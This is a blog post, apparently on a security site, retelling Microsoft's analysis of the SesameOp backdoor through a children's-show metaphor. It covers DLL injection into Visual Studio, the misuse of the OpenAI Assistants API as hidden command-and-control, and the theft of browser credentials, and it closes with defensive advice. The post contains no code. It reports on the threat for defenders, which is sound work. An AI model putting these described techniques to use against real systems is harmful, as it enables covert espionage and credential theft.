top of page

SesameOp Opens the Wrong Door on the Children’s Show Set

  • Foto del escritor: Javier  Conejo del Cerro
    Javier Conejo del Cerro
  • hace 3 días
  • 3 Min. de lectura
ree

Behind the cheerful façade of a colorful children’s TV set, the threat actor turned the stage lights toward something darker. Microsoft Incident Response (DART) uncovered a stealthy backdoor called SesameOp, designed to hide its malicious choreography inside trusted tools and innocent-looking network traffic.

Rather than using classic command-and-control servers, the operators abused the OpenAI Assistants API — turning a legitimate AI platform into a covert communication line. Hidden within compromised Visual Studio utilities, SesameOp fetched, decrypted, and executed encrypted commands while maintaining persistence for months. The puppets were dancing, but someone else was pulling the strings.


Phase 1 — The Backstage Infiltration 


Like stagehands slipping unnoticed behind the curtains, the attackers injected malicious libraries into Microsoft Visual Studio utilities, exploiting the .NET AppDomainManager injection method. This technique allowed the malware to load during legitimate development operations, running parallel to trusted processes and avoiding immediate detection.

The compromise began on developer workstations and build servers — internal, high-trust environments rarely scrutinized for outbound API traffic. Once planted, the loader (Netapi64.dll) created markers and mutexes to ensure persistence and launched OpenAIAgent.Netapi64, the main component of the backdoor.

Its purpose: to maintain a covert presence inside enterprise networks and quietly prepare the stage for long-term espionage.


Phase 2 — Learning to Count (Stolen Files) 


With the curtains open, SesameOp began to act. The .NET-based backdoor connected to the OpenAI Assistants API, masquerading its communications as legitimate AI-related requests. It queried vector stores and Assistant lists, hiding instructions and payloads within normal API interactions.

When receiving a command, the backdoor decrypted and decompressed it, executing scripts locally to enumerate files, capture screenshots, and extract information from browsers — including cookies, histories, credentials, and saved sessions.

Each result was encrypted again, Base64-encoded, and sent back to the same API, disguised as ordinary AI task responses.

The data stolen included authentication tokens, system information, sensitive documents, and browser data — all valuable for further compromise or lateral movement. Within months, the puppet master had complete visibility of the affected environment.


Phase 3 — Opening the Wrong Door (Oops, Somebody Snuck In) 


The backdoor’s control mechanism was both creative and alarming. Instead of connecting to a known server or IP, SesameOp used OpenAI’s cloud infrastructure as its stage. Each instruction, labeled “SLEEP,” “Payload,” or “Result,” was stored inside legitimate OpenAI API objects — such as Assistants or vector stores — turning the platform into a neutral relay that hid malicious intent.

For defenders, this tactic blurred the line between normal AI usage and malicious traffic. Security tools saw HTTPS requests to api.openai.com — a fully trusted service — and marked them as benign.

By exploiting that blind trust, the attackers could coordinate actions, pull updates, and exfiltrate results while staying invisible among authentic API calls.

This sophisticated abuse of legitimate infrastructure exemplifies the new reality of AI-integrated threats: where trusted platforms become silent intermediaries for covert operations.


Phase 4 — Puppet Persistence 


SesameOp didn’t just appear and vanish. Its persistence mechanism — the combination of obfuscated DLLs, mutex control, and embedded configuration files — ensured the puppets kept performing long after the first act. The malware dynamically loaded modules through reflection and executed JavaScript code via Microsoft JScript VsaEngine, granting flexibility to run any payload delivered through the API.

Its encryption scheme — dual-layered with AES and RSA keys, and additional GZIP compression — was designed for stealth and efficiency. Each communication cycle looked small, clean, and harmless to network sensors. This meticulous engineering highlights a strategic intent: not rapid destruction, but quiet, durable espionage.


Phase 5 — The Final Scene: Closing the Door 


Microsoft and OpenAI jointly investigated the incident, identifying and disabling the malicious API key and associated account. The account, while used for limited API calls, had not interacted with models beyond the Assistants API, confirming that the threat was misuse of legitimate functionality, not a breach of OpenAI itself.

The broader lesson is clear: threat actors are adapting to the AI era, repurposing APIs, automation, and SaaS capabilities as covert infrastructure. Organizations can no longer rely solely on domain reputation or simple IP filtering.


Conclusions — Keeping the Puppets Off the Stage

 

To dismantle SesameOp-style operations and prevent future performances:

  • Audit developer environments and Visual Studio dependencies regularly for unusual DLL injections.

  • Monitor outbound API traffic — even to trusted cloud domains like OpenAI — for anomalies or abnormal frequency.

  • Restrict egress connections and enforce proxy policies to prevent unauthorized service use.

  • Enable tamper protection and ensure EDR/XDR in block mode to catch encrypted or obfuscated C2 activity.

  • Rotate keys and credentials frequently to reduce persistence opportunities.

  • Educate development teams about supply chain risks in build and packaging systems.


The show must go on — but with the right controls in place, only the good puppets will take the stage next time.



Microsoft.


 
 
 

Comentarios


bottom of page